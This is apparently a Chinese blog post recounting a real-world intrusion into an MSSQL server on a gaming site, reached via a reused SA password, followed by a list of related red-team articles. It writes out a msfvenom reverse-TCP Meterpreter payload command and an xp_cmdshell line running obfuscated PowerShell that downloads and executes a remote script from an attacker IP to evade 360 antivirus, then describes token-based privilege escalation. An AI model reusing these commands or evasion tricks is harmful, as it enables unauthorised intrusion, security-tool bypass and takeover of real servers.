MSSQL绕过360提权实战案例

本文涉及的产品
Redis 开源版,标准版 2GB
推荐场景:
搭建游戏排行榜
云数据库 Tair(兼容Redis),内存型 2GB
简介: MSSQL绕过360提权实战案例

0x01 前言

这个案例是帮“ChaBug”群里一个朋友看的,说是某QP站点,直接是个支持外链的MSSQL,但不是弱口令,SA密码是在以前的服务器上找到的,这台机器应该是刚搬迁过来的服务器,用了原来的SA密码,所以可以直接远程连接,并支持xp_cmdshell执行命令,未做站库分离处理!


0x02 搜集

目标机器基本信息:

    目标系统:Windows Server 2012 R2(Apache2.4.23 + PHP7.1.9)
    数据库版本:Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64)
    当前权限:nt service\mssqlserver
    开放端口:80、135、1433、2383、3306、3389、22222(Tomcat/8.5.42)......
    进程名称:phpStudy.exe、http.exe、httpd.exe、mysqld.exe、navicat.exe、androidLoad.exe、GameServer.exe(游戏服务端)、LogServer.exe(日志服务)、redis-cli.exe(redis客户端)、redis-server.exe(redis服务端)、Tomcat8.new.exe(Tomcat8.new服务)、Tomcat8.neww.exe、sqlservr.exe(MSSQL服务端)、ZhuDongFangYu.exe(360主动防御)......


    将目标机器的进程列表拿到开源的“Windows杀软在线对比辅助”上进行对比发现存在360主动防御的进程,当前权限为nt service\mssqlserver。

    0x03 实战提权过程

    根据他的描述说是项目站点放在C盘,但是在当前权限下不能用dir命令查看C盘下的文件,会提示“拒绝访问。只能查看D盘下的文件,经过测试发现确实如此,但他的思路局限于非得找到网站绝对路径,写入Webshell后再进行权限提升,其实大可不必这样。

    而我的思路就是直接利用MSF的web_delivery或hta_server模块来获取一个Meterpreter会话,然后再进行权限提升即可。但是在测试过程中也遇到一点小问题,web_delivery执行时出现“标识符太长”的报错,hta_server执行底层powershell.exe时被360的进程防护给拦截了。


    这里我们重新生成一个psh-reflection格式的Payload,然后用xp_cmdshell来执行经过混淆后的Powershell远程执行ps1脚本命令,可以看到已经成功获取到目标机器会话了,其实这也就是这篇文章中主要讲的利用Powershell命令混淆来绕过360进程防护拦截

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.**.**.238 LPORT=443 -f psh-reflection > /tmp/360.ps1

    exec master.dbo.xp_cmdshell "powershell $a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.**.**.238:8888/360.ps1''))';IEX ($a+$b)"


    获取到会话后可直接使用Incognito扩展来进行权限提升,因为目标机器上有在运行navicat.exe数据库连接工具,并以Windows身份验证的方式连接的MSSQL,所以会拥有高权限令牌


    注:通过前期的信息搜集得知里边还运行着phpStudy、Tomcat,它们默认都是以高权限运行的,所以也可以尝试找到绝对路径往里边写一个Webshell来进行权限提升,不过这个案例中禁止当前权限读取C盘下的文件,写入权限就更不用说了,这里仅为大家扩展这么一种提权思路。



    相关文章
    |
    供应链 中间件
    哥斯拉内存马/Suo5内存代理插件
    哥斯拉内存马/Suo5内存代理插件
    1412 0
    |
    NoSQL 安全 MongoDB
    MongoDB 未授权访问漏洞利用
    MongoDB 未授权访问漏洞利用
    2306 0
    |
    开发框架 安全 前端开发
    [ 代码审计篇 ] Java web 代码审计 详解(一)
    之前写了一篇关于代码审计流程的文章,有小伙伴私聊我说不太好理解,这里开始介绍 Java web 的代码审计,同样的来捋一捋审计思路,这就相对要具体一些。
    2307 0
    [ 代码审计篇 ] Java web 代码审计 详解(一)
    |
    安全 Java API
    解决 Swagger API 未授权访问漏洞:完善分析与解决方案
    Swagger 是一个用于设计、构建、文档化和使用 RESTful 风格的 Web 服务的开源软件框架。它通过提供一个交互式文档页面,让开发者可以更方便地查看和测试 API 接口。然而,在一些情况下,未经授权的访问可能会导致安全漏洞。本文将介绍如何解决 Swagger API 未授权访问漏洞问题。
    |
    SQL Shell 数据库
    MSSQL绕过微软杀毒提权案例
    MSSQL绕过微软杀毒提权案例
    444 0
    |
    9月前
    |
    移动开发 前端开发 Java
    Java最新图形化界面开发技术——JavaFx教程(含UI控件用法介绍、属性绑定、事件监听、FXML)
    JavaFX是Java的下一代图形用户界面工具包。JavaFX是一组图形和媒体API,我们可以用它们来创建和部署富客户端应用程序。 JavaFX允许开发人员快速构建丰富的跨平台应用程序,允许开发人员在单个编程接口中组合图形,动画和UI控件。本文详细介绍了JavaFx的常见用法,相信读完本教程你一定有所收获!
    8835 5
    Java最新图形化界面开发技术——JavaFx教程(含UI控件用法介绍、属性绑定、事件监听、FXML)
    |
    开发框架 安全 .NET
    Web安全-文件上传漏洞与WAF绕过
    Web安全-文件上传漏洞与WAF绕过
    729 4
    |
    开发框架 安全 .NET
    记一次绕过安全狗和360提权案例
    记一次绕过安全狗和360提权案例
    290 0
    |
    安全 Windows
    【红队APT】钓鱼篇&Office-CVE&RLO隐藏&压缩包释放&免杀打包捆绑
    【红队APT】钓鱼篇&Office-CVE&RLO隐藏&压缩包释放&免杀打包捆绑
    241 1
    |
    运维 关系型数据库 MySQL
    绕过360安全卫士提权实战案例
    绕过360安全卫士提权实战案例
    753 1